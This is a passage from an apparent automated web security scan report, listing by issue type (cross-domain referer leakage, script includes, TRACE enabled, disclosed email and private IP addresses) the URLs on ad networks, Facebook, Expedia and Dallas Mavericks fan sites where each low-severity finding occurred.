13.178. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

13.179. http://tiger.vizu.com/a.gif

13.180. http://timecom.122.2o7.net/b/ss/timecom/1/H.20.2/s79694016552530

13.181. http://tr.adinterax.com/re/mcclatchyinteractive%2CDFW_Y_Star-tel_LB_0222%2CC%3DDFW_Mavericks%2CP%3DDFW-StarTelegram%2CK%3D492697/0.8334790775552392/0/in%2Cti/ti.gif

13.182. http://tvfanatic.us.intellitxt.com/intellitxt/front.asp

13.183. http://u.openx.net/w/1.0/sc

13.184. http://vap3den1.lijit.com/www/delivery/lg.php

13.185. http://viacom.adbureau.net/LSERVER/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90

13.186. http://viacom.adbureau.net/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90

13.187. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s75181884909979

13.188. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s77238202237058

13.189. http://vt.imiclk.com/cgi/vtc.cgi

13.190. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/14683/NF/RETURN-CODE/JS/

13.191. http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp

13.192. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx

13.193. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp

13.194. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

13.195. http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp

13.196. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp

13.197. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp

13.198. http://www.expedia.com/hotel.h892034.Hotel-Information

13.199. http://www.googleadservices.com/pagead/aclk

13.200. http://www.imdb.com/title/tt0944947/

13.201. http://www.lijit.com/beacon

13.202. http://www.tiqiq.com/Tiqiq/PublisherHomePage.aspx

13.203. http://www.tiqiq.com/WebServices/EventsData.asmx/LogUserAction

13.204. http://www.wtp101.com/admeld_sync

13.205. http://www.wtp101.com/cox_sync

13.206. http://www22.glam.com/cTagsImgCmd.act

14. Password field with autocomplete enabled

14.1. https://login.yahoo.com/config/login_verify2

14.2. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

14.3. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us

14.4. http://www.mavsmoneyball.com/fanposts

14.5. http://www.mavsmoneyball.com/mavericks-tickets

14.6. http://www.nba.com/mavericks/index_main.html

14.7. http://www.nba.com/mavericks/index_main.html

15. Source code disclosure

15.1. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif

15.2. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif

15.3. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

15.4. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png

16. Referer-dependent response

16.1. http://ad.yieldmanager.com/imp

16.2. http://adnxs.revsci.net/imp

16.3. http://ads.adbrite.com/adserver/vdi/742697

16.4. http://api.twitter.com/1/FanSided/lists//statuses.json

16.5. http://tag.admeld.com/ad/js/195/fsv/728x90/ros

16.6. http://www.apture.com/js/apture.js

16.7. http://www.expedia.com/hotel.h892034.Hotel-Information

16.8. http://www.facebook.com/extern/login_status.php

16.9. http://www.facebook.com/plugins/activity.php

16.10. http://www.facebook.com/plugins/like.php

16.11. http://www.facebook.com/plugins/likebox.php

16.12. http://www.facebook.com/widgets/like.php

17. Cross-domain POST

17.1. http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/

17.2. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html

17.3. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

17.4. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

17.5. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us

17.6. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us

17.7. http://www.mavsmoneyball.com/fanposts

17.8. http://www.mavsmoneyball.com/fanposts

17.9. http://www.mavsmoneyball.com/mavericks-tickets

17.10. http://www.mavsmoneyball.com/mavericks-tickets

17.11. http://www.nba.com/mavericks/index_main.html

17.12. http://www.nba.com/mavericks/index_main.html

18. Cross-domain Referer leakage

18.1. http://ad.amgdgt.com/ads/

18.2. http://ad.amgdgt.com/ads/

18.3. http://ad.amgdgt.com/ads/

18.4. http://ad.amgdgt.com/ads/

18.5. http://ad.amgdgt.com/ads/

18.6. http://ad.amgdgt.com/ads/

18.7. http://ad.amgdgt.com/ads/

18.8. http://ad.amgdgt.com/ads/

18.9. http://ad.amgdgt.com/ads/

18.10. http://ad.amgdgt.com/ads/

18.11. http://ad.amgdgt.com/ads/

18.12. http://ad.amgdgt.com/ads/

18.13. http://ad.amgdgt.com/ads/

18.14. http://ad.amgdgt.com/ads/

18.15. http://ad.amgdgt.com/ads/

18.16. http://ad.amgdgt.com/ads/

18.17. http://ad.amgdgt.com/ads/

18.18. http://ad.amgdgt.com/ads/

18.19. http://ad.doubleclick.net/adi/N1558.NetMining/B5527925

18.20. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

18.21. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

18.22. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7

18.23. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3

18.24. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3

18.25. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

18.26. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

18.27. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

18.28. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2

18.29. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8

18.30. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8

18.31. http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7

18.32. http://ad.doubleclick.net/adi/amzn.us.audienceextension/

18.33. http://ad.doubleclick.net/adi/x1.dt/dt2

18.34. http://ad.doubleclick.net/adi/x1.dt/dt2

18.35. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt

18.36. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt

18.37. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt

18.38. http://ad.doubleclick.net/adj/N2949.280881.BUZZMEDIA/B5492484.2

18.39. http://ad.doubleclick.net/adj/N2949.280881.BUZZMEDIA/B5492484.3

18.40. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11

18.41. http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in

18.42. http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in

18.43. http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in

18.44. http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in

18.45. http://ad.doubleclick.net/adj/fansided.fsv/ros

18.46. http://ad.doubleclick.net/adj/gm.kotaku/e3

18.47. http://ad.doubleclick.net/adj/gm.kotaku/pax

18.48. http://ad.doubleclick.net/adj/gm.kotaku/threeDS

18.49. http://ad.doubleclick.net/adj/imdb2.consumer.title/maindetails

18.50. http://ad.doubleclick.net/adj/imdb2.consumer.title/maindetails

18.51. http://ad.doubleclick.net/adj/mavericks.dart/homepage_bottom_left_728x90

18.52. http://ad.doubleclick.net/adj/mavericks.dart/homepage_bottom_right_200x90

18.53. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/hcb/favicon

18.54. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler

18.55. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/hcb/favicon

18.56. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler

18.57. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler

18.58. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler

18.59. http://ad.doubleclick.net/adj/team_sites.dart/global_nav

18.60. http://ad.doubleclick.net/adj/ugo.ugo.tv/tv-index

18.61. http://ad.doubleclick.net/adj/ugo.ugo.tv/tv-index

18.62. http://ad.turn.com/server/ads.js

18.63. http://ad.turn.com/server/ads.js

18.64. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536

18.65. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131

18.66. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778

18.67. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455**

18.68. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073**

18.69. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673**

18.70. http://ad.yieldmanager.com/iframe3

18.71. http://ad.yieldmanager.com/iframe3

18.72. http://ad.yieldmanager.com/iframe3

18.73. http://ad.yieldmanager.com/pixel

18.74. http://ad.yieldmanager.com/v0/admeld-match

18.75. http://adadvisor.net/adscores/g.js

18.76. http://admeld-match.dotomi.com/admeld/match

18.77. http://admeld.adnxs.com/usersync

18.78. http://admeld.lucidmedia.com/clicksense/admeld/match

18.79. http://admin.brightcove.com/js/BrightcoveExperiences.js

18.80. http://adopt.imiclk.com/emb/q

18.81. http://adopt.imiclk.com/emb/q

18.82. http://ads.bluelithium.com/st

18.83. http://ads.tw.adsonar.com/adserving/getAds.jsp

18.84. http://adserv.impactengine.com/www/7u/8t/1p/2b/objembed.html

18.85. http://adserv.impactengine.com/www/8i/8j/9q/km/objembed.html

18.86. http://adserv.impactengine.com/www/j8/4t/w4/uf/objembed.html/@@1305142019@@

18.87. http://adserv.impactengine.com/www/l3/df/ey/qw/objembed.html/@@1302711674@@

18.88. http://adserver.veruta.com/cookiematch.fcgi

18.89. http://api.twitter.com/1/FanSided/lists//statuses.json

18.90. http://apps.conduit-banners.com/Twackle-Twackle_Sports

18.91. http://as.jivox.com/player/iabplayer.php

18.92. http://as.jivox.com/player/iabplayer.php

18.93. http://as.jivox.com/player/jivox_ad_tags.php

18.94. http://as.jivox.com/player/jivox_ad_tags.php

18.95. http://bidnw.ru4.com/nf

18.96. http://bidnw.ru4.com/nf

18.97. http://bn.xp1.ru4.com/nf

18.98. http://bp.specificclick.net/

18.99. http://bpx.a9.com/ads/getad

18.100. http://bpx.a9.com/ads/render

18.101. http://cdn.extensions.buzznet.com/topscript.js.php

18.102. http://cim.meebo.com/cim

18.103. http://cm.g.doubleclick.net/pixel

18.104. http://cm.g.doubleclick.net/pixel

18.105. http://cm.g.doubleclick.net/pixel

18.106. http://cm.g.doubleclick.net/pixel

18.107. http://cm.npc-lee.overture.com/js_1_0/

18.108. http://cms.ad.yieldmanager.net/v1/cms

18.109. http://creativeby1.unicast.com/assets/A322/N26843/M13937/P1944/Q72996/script_850_40.js

18.110. http://dg.specificclick.net/

18.111. http://fls.doubleclick.net/activityi

18.112. http://fls.doubleclick.net/activityi

18.113. http://fls.doubleclick.net/activityi

18.114. http://googleads.g.doubleclick.net/pagead/ads

18.115. http://googleads.g.doubleclick.net/pagead/ads

18.116. http://googleads.g.doubleclick.net/pagead/ads

18.117. http://googleads.g.doubleclick.net/pagead/ads

18.118. http://googleads.g.doubleclick.net/pagead/ads

18.119. http://googleads.g.doubleclick.net/pagead/ads

18.120. http://googleads.g.doubleclick.net/pagead/ads

18.121. http://googleads.g.doubleclick.net/pagead/ads

18.122. http://googleads.g.doubleclick.net/pagead/ads

18.123. http://googleads.g.doubleclick.net/pagead/ads

18.124. http://googleads.g.doubleclick.net/pagead/ads

18.125. http://googleads.g.doubleclick.net/pagead/ads

18.126. http://googleads.g.doubleclick.net/pagead/ads

18.127. http://googleads.g.doubleclick.net/pagead/ads

18.128. http://googleads.g.doubleclick.net/pagead/ads

18.129. http://googleads.g.doubleclick.net/pagead/ads

18.130. http://googleads.g.doubleclick.net/pagead/ads

18.131. http://googleads.g.doubleclick.net/pagead/ads

18.132. http://googleads.g.doubleclick.net/pagead/ads

18.133. http://googleads.g.doubleclick.net/pagead/ads

18.134. http://googleads.g.doubleclick.net/pagead/ads

18.135. http://googleads.g.doubleclick.net/pagead/ads

18.136. http://googleads.g.doubleclick.net/pagead/ads

18.137. http://googleads.g.doubleclick.net/pagead/ads

18.138. http://googleads.g.doubleclick.net/pagead/ads

18.139. http://googleads.g.doubleclick.net/pagead/ads

18.140. http://googleads.g.doubleclick.net/pagead/ads

18.141. http://googleads.g.doubleclick.net/pagead/ads

18.142. http://googleads.g.doubleclick.net/pagead/ads

18.143. http://googleads.g.doubleclick.net/pagead/ads

18.144. http://googleads.g.doubleclick.net/pagead/ads

18.145. http://googleads.g.doubleclick.net/pagead/ads

18.146. http://googleads.g.doubleclick.net/pagead/ads

18.147. http://googleads.g.doubleclick.net/pagead/ads

18.148. http://googleads.g.doubleclick.net/pagead/ads

18.149. http://googleads.g.doubleclick.net/pagead/ads

18.150. http://googleads.g.doubleclick.net/pagead/ads

18.151. http://googleads.g.doubleclick.net/pagead/ads

18.152. http://googleads.g.doubleclick.net/pagead/ads

18.153. http://googleads.g.doubleclick.net/pagead/ads

18.154. http://googleads.g.doubleclick.net/pagead/ads

18.155. http://googleads.g.doubleclick.net/pagead/ads

18.156. http://googleads.g.doubleclick.net/pagead/ads

18.157. http://googleads.g.doubleclick.net/pagead/ads

18.158. http://googleads.g.doubleclick.net/pagead/ads

18.159. http://googleads.g.doubleclick.net/pagead/ads

18.160. http://googleads.g.doubleclick.net/pagead/ads

18.161. http://googleads.g.doubleclick.net/pagead/ads

18.162. http://googleads.g.doubleclick.net/pagead/ads

18.163. http://googleads.g.doubleclick.net/pagead/ads

18.164. http://googleads.g.doubleclick.net/pagead/ads

18.165. http://googleads.g.doubleclick.net/pagead/ads

18.166. http://googleads.g.doubleclick.net/pagead/ads

18.167. http://googleads.g.doubleclick.net/pagead/ads

18.168. http://ib.adnxs.com/ab

18.169. http://ib.adnxs.com/ab

18.170. http://ib.adnxs.com/ab

18.171. http://ib.adnxs.com/ptj

18.172. http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js

18.173. http://img.timeinc.net/time/rd/trunk/www/web/feds/j/articles.js

18.174. http://k.collective-media.net/cmadj/cm.mtv/ent_010111

18.175. http://kotaku.com/static/ad_iframe.php

18.176. http://kotaku.com/static/ad_iframe.php

18.177. http://l.yimg.com/j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js

18.178. http://l.yimg.com/j/assets/eJx9kWFuhCAQhU-kooC46WEMi3RlVxjDQDfu6QvYJtq0_QV5883jMXPHZoum6WpRk3xbQE7aVxPYSn9oF2rfMtp17dv9CCpwTqtgwFXWuN8Z6YyV_yN3_L1Ka7qn-SpyMVCei6ilV_MoEQ2GJhXNfh07Qi5k6Ejb0-HoloJikC5gEnuWmOKygi8K43wovtf4eh3bgrzi2QYeRmdFDJxlZQarRwtTXHQmOaFDXzqNemh_7H0aN8HzqKACr8N8_reVTt7OnUp6iKiXoxaX00omg2oBjD6H61vByB7XWnDNhmuVIpZTzVo9yos9p-zyB2X0pVqNq4KXmb4lXJA0pIx7uZopf7UTrAztfdkg5jSCMloc10Vu2o_7ln6kHq8QAthv9RPVHctE.js

18.179. http://l.yimg.com/zz/combo

18.180. http://load.exelator.com/load/

18.181. https://login.yahoo.com/config/login_verify2

18.182. http://mediacdn.disqus.com/1307735099/build/system/disqus.js

18.183. http://my.yahoo.com/darla/fc.php

18.184. http://my.yahoo.com/darla/fc.php

18.185. http://my.yahoo.com/darla/fc.php

18.186. http://my.yahoo.com/darla/fc.php

18.187. http://my.yahoo.com/darla/fc.php

18.188. http://my.yahoo.com/darla/fc.php

18.189. http://my.yahoo.com/darla/fc.php

18.190. http://my.yahoo.com/darla/fc.php

18.191. http://n4403ad.doubleclick.net/adj/gn.sk.tvfanatic.com/ros

18.192. http://n4403ad.doubleclick.net/adj/gn.sk.tvfanatic.com/ros

18.193. http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/solo/1@x06

18.194. http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Left

18.195. http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Position2

18.196. http://open.ad.yieldmanager.net/a1

18.197. http://open.ad.yieldmanager.net/a1

18.198. http://pagead2.googlesyndication.com/pagead/ads

18.199. http://pagead2.googlesyndication.com/pagead/ads

18.200. http://pixel.invitemedia.com/admeld_sync

18.201. http://pixel.invitemedia.com/admeld_sync

18.202. http://platform0.twitter.com/widgets/follow_button.html

18.203. http://showadsak.pubmatic.com/AdServer/AdServerServlet

18.204. http://sports.yahoo.com/nba/expertsarchive

18.205. http://sports.yahoo.com/nba/news

18.206. http://sports.yahoo.com/nba/news

18.207. http://sports.yahoo.com/nba/news

18.208. http://thesouthern.com/content/tncms/live/global/resources/scripts/common.js

18.209. http://um.simpli.fi/am_js.js

18.210. http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information

18.211. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

18.212. http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp

18.213. http://www.expedia.com/static/default/default/scripts/exp/core/ChannelTracking.js

18.214. http://www.facebook.com/plugins/activity.php

18.215. http://www.facebook.com/plugins/comments.php

18.216. http://www.facebook.com/plugins/like.php

18.217. http://www.facebook.com/plugins/likebox.php

18.218. http://www.facebook.com/plugins/likebox.php

18.219. http://www.facebook.com/plugins/likebox.php

18.220. http://www.facebook.com/plugins/likebox.php

18.221. http://www.facebook.com/plugins/likebox.php

18.222. http://www.facebook.com/plugins/likebox.php

18.223. http://www.facebook.com/plugins/recommendations.php

18.224. http://www.facebook.com/widgets/like.php

18.225. http://www.google.com/hostednews/ap/article/ALeqM5iGfrQs22UmRhzj0PiJzcmIjzcnKg

18.226. http://www.google.com/trends/hottrends

18.227. http://www.google.com/trends/hottrends

18.228. http://www.google.com/trends/hottrends

18.229. http://www.google.com/trends/hottrends

18.230. http://www.nba.com/video/cvp/teamarticleplayer.html

18.231. http://www.paperg.com/jsfb/embed.php

18.232. http://www.stumbleupon.com/badge/embed/5/

18.233. http://www.ugo.com/cm/ugo/js/ugo-global.js

18.234. http://www2.glam.com/app/site/affiliate/viewChannelModule.act

19. Cross-domain script include

19.1. http://ad.amgdgt.com/ads/

19.2. http://ad.amgdgt.com/ads/

19.3. http://ad.amgdgt.com/ads/

19.4. http://ad.amgdgt.com/ads/

19.5. http://ad.amgdgt.com/ads/

19.6. http://ad.amgdgt.com/ads/

19.7. http://ad.amgdgt.com/ads/

19.8. http://ad.amgdgt.com/ads/

19.9. http://ad.amgdgt.com/ads/

19.10. http://ad.amgdgt.com/ads/

19.11. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

19.12. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

19.13. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7

19.14. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2

19.15. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8

19.16. http://ad.doubleclick.net/adi/x1.dt/dt2

19.17. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt

19.18. http://ad.doubleclick.net/adj/fansided.fsv/ros

19.19. http://adopt.imiclk.com/emb/q

19.20. http://adopt.imiclk.com/emb/q

19.21. http://bidnw.ru4.com/nf

19.22. http://bidnw.ru4.com/nf

19.23. http://bn.xp1.ru4.com/nf

19.24. http://cdn.triggertag.gorillanation.com/js/triggertag.js

19.25. http://fansided.com/category/nba/

19.26. http://fls.doubleclick.net/activityi

19.27. http://g-ecx.images-amazon.com/images/G/01/pda/pda.js

19.28. http://googleads.g.doubleclick.net/pagead/ads

19.29. http://googleads.g.doubleclick.net/pagead/ads

19.30. http://googleads.g.doubleclick.net/pagead/ads

19.31. http://googleads.g.doubleclick.net/pagead/ads

19.32. http://googleads.g.doubleclick.net/pagead/ads

19.33. http://googleads.g.doubleclick.net/pagead/ads

19.34. http://googleads.g.doubleclick.net/pagead/ads

19.35. http://googleads.g.doubleclick.net/pagead/ads

19.36. http://googleads.g.doubleclick.net/pagead/ads

19.37. http://googleads.g.doubleclick.net/pagead/ads

19.38. http://googleads.g.doubleclick.net/pagead/ads

19.39. http://googleads.g.doubleclick.net/pagead/ads

19.40. http://googleads.g.doubleclick.net/pagead/ads

19.41. http://googleads.g.doubleclick.net/pagead/ads

19.42. http://googleads.g.doubleclick.net/pagead/ads

19.43. http://googleads.g.doubleclick.net/pagead/ads

19.44. http://googleads.g.doubleclick.net/pagead/ads

19.45. http://googleads.g.doubleclick.net/pagead/ads

19.46. http://googleads.g.doubleclick.net/pagead/ads

19.47. http://ib.adnxs.com/ab

19.48. http://idolator.com/ifb/audience-science.html

19.49. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php

19.50. http://kotaku.com/static/ad_iframe.php

19.51. http://kotaku.com/static/ad_iframe.php

19.52. http://kotaku.com/static/items/kotaku.com/trackers.html

19.53. https://login.yahoo.com/config/login_verify2

19.54. http://media.photobucket.com/image/recent/Smirk_Dog/GIFS/MacSigDance.gif

19.55. http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/

19.56. http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/solo/1@x06

19.57. http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Left

19.58. http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Position2

19.59. http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/

19.60. http://sportdfw.com/aboutcontact-us/

19.61. http://sportdfw.com/img/city/dallas/img/content-email-submit.gif

19.62. http://sportdfw.com/z-the-fort-worth-four/

19.63. http://sports.yahoo.com/nba/expertsarchive

19.64. http://sports.yahoo.com/nba/news

19.65. http://sports.yahoo.com/nba/news

19.66. http://sports.yahoo.com/nba/news

19.67. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html

19.68. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

19.69. http://www.facebook.com/plugins/activity.php

19.70. http://www.facebook.com/plugins/comments.php

19.71. http://www.facebook.com/plugins/like.php

19.72. http://www.facebook.com/plugins/likebox.php

19.73. http://www.facebook.com/plugins/recommendations.php

19.74. http://www.facebook.com/widgets/like.php

19.75. http://www.gamershell.com/news_118846.html

19.76. http://www.imdb.com/images/a/ifb/google_afc_labs.html

19.77. http://www.imdb.com/images/a/ifb/pda_comm2.html

19.78. http://www.imdb.com/title/tt0944947/

19.79. http://www.imdb.com/title/tt0944947/_ajax/footer

19.80. http://www.mavgear.com/Dallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html

19.81. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

19.82. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

19.83. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us

19.84. http://www.mavsmoneyball.com/fanposts

19.85. http://www.mavsmoneyball.com/mavericks-tickets

19.86. http://www.mavsmoneyball.com/mavericks-tickets

19.87. http://www.mavsmoneyball.com/mavericks-tickets

19.88. http://www.nba.com/mavericks/index_main.html

19.89. http://www.nba.com/mavericks/playoffs/2011_nba_finals_champions.html

19.90. http://www.nba.com/video/cvp/teamarticleplayer.html

19.91. http://www.stumbleupon.com/badge/embed/5/

19.92. http://www.twackle.com/

19.93. http://www.twackle.com/fansided/General_Twackle_Widget

19.94. http://www.twackle.com/headlines

19.95. http://www.ugo.com/cm/ugo/js/ugo-global.js

19.96. http://www.ugo.com/xd_receiver.htm

19.97. http://z-ecx.images-amazon.com/images/G/01/pda/ifc._V195103274_.js

20. TRACE method is enabled

20.1. http://ads.pubmatic.com/

20.2. http://d.xp1.ru4.com/

20.3. http://dg.specificclick.net/

20.4. http://m.xp1.ru4.com/

20.5. http://secure-us.imrworldwide.com/

20.6. http://track1000.pubmatic.com/

21. Email addresses disclosed

21.1. http://ads.adbrite.com/adserver/vdi/742697

21.2. http://fastcache.gawkerassets.com/assets/base.v10/static/base.v10.widget.s20110610a.js

21.3. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/wpaudio.js

21.4. http://img.timeinc.net/tii/omniture/h/common.js

21.5. http://img.timeinc.net/time/rd/trunk/www/web/feds/j/mobileExperience.js

21.6. https://login.yahoo.com/config/login_verify2

21.7. http://mediacdn.disqus.com/1307735099/build/system/disqus.js

21.8. http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js

21.9. http://sportdfw.com/aboutcontact-us/

21.10. http://sportdfw.com/wp-content/plugins/wp-recaptcha/recaptcha.css

21.11. http://thesouthern.com/content/tncms/live/global/resources/scripts/common.js

21.12. http://thesouthern.com/content/tncms/live/global/resources/scripts/facebox.js

21.13. http://thesouthern.com/content/tncms/live/global/resources/scripts/port-comments.js

21.14. http://thesouthern.com/content/tncms/live/global/resources/styles/skin.css

21.15. http://widgets3.flux.com/Widget/ContentAction/3023/en-US

21.16. http://www.hbo.com/utils/js/jquery/plugins/jquery.cookie.js

21.17. http://www.mavgear.com/skin1/menu.js

21.18. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

21.19. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us

21.20. http://www.mavsmoneyball.com/fanposts

21.21. http://www.mavsmoneyball.com/mavericks-tickets

21.22. http://www.mtv.com/global/music/modules/followUs/js/index.jhtml

21.23. http://www.nba.com/js/controls.js

21.24. http://www.nba.com/js/cookieFunctions.js

21.25. http://www.nba.com/js/dragdrop.js

21.26. http://www.twackle.com/

21.27. http://www.twackle.com/headlines

21.28. http://www.twackle.com/javascripts/all.js

22. Private IP addresses disclosed

22.1. http://api.connect.facebook.com/static/v0.4/client_restserver.php

22.2. http://connect.facebook.net/en_US/all.js

22.3. http://desmond.yfrog.com/Himg737/scaled.php

22.4. http://external.ak.fbcdn.net/safe_image.php

22.5. http://external.ak.fbcdn.net/safe_image.php

22.6. http://external.ak.fbcdn.net/safe_image.php

22.7. http://external.ak.fbcdn.net/safe_image.php

22.8. http://external.ak.fbcdn.net/safe_image.php

22.9. http://external.ak.fbcdn.net/safe_image.php

22.10. http://external.ak.fbcdn.net/safe_image.php

22.11. http://external.ak.fbcdn.net/safe_image.php

22.12. http://external.ak.fbcdn.net/safe_image.php

22.13. http://external.ak.fbcdn.net/safe_image.php

22.14. http://external.ak.fbcdn.net/safe_image.php

22.15. http://graph.facebook.com/1599594030/picture

22.16. http://graph.facebook.com/680122358/picture

22.17. http://graph.facebook.com/695375004/picture

22.18. http://graph.facebook.com/701741542/picture

22.19. http://justjared.buzznet.com/favicon.ico

22.20. http://justjared.buzznet.com/favicon.ico

22.21. http://media.expedia.com/ads/travelhook/travelhook.js

22.22. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif

22.23. http://static.ak.connect.facebook.com/connect.php

22.24. http://static.ak.connect.facebook.com/connect.php/en_US

22.25. http://static.ak.connect.facebook.com/connect.php/en_US

22.26. http://static.ak.connect.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

